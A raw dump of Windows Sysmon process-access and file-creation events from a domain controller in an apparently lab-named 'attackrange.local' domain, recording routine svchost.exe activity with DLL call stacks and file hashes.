|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appsconversions.txtMD5=F21F68AB0FD9BF5B4255EDDDE72BE816,SHA256=9034FBD5F370A37A2E43CAE5D482B84D3ED9B6C62C6DDBC4BEE25B0526AD25EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\apps.schemaMD5=1659677C45C49A78F33551DA43494005,SHA256=5AF0FC2A0B5CCECDC04E54B3C60F28E3FF5C7D4E1809C6D7C8469F0567C090BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\apps.csgMD5=FB7202F6D377FD89C7B261E34D680D33,SHA256=839D24F509CA8BF8737074BF42E83A88A32EE3760BD34BBA2A7CF6CF482A1C0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.756{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.756{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.756{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.725{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 